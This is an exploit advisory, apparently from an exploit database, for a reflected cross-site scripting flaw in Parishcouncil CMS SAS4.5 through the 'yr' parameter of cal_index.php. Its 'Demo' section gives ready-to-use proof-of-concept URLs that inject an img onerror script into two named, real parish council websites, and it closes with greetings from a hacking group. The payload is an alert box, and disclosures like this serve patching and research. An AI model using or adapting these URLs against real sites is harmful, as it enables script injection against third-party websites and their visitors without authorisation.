###################### # Exploit Title : Parishcouncil CMS SAS4.5 / Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.parishcouncilwebsites.com/updating.php # Category: [ Webapps ] # Tested on: [ Win ] # Version: SAS4.5 # Date: 2016/06/21 ###################### # # PoC: # yr Get Parameter Vulnerable To XSS # Payload : '> # Demo : #http://www.barkham-parishcouncil.org.uk/content/cal_index.php?mo=7&yr=2016%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E #http://www.folksworthandwashingley-pc.org.uk/content/cal_index.php?mo=7&yr=2016%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E ###################### # Discovered by : Mojtaba MobhaM # Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members # Homepage : persian-team.ir ######################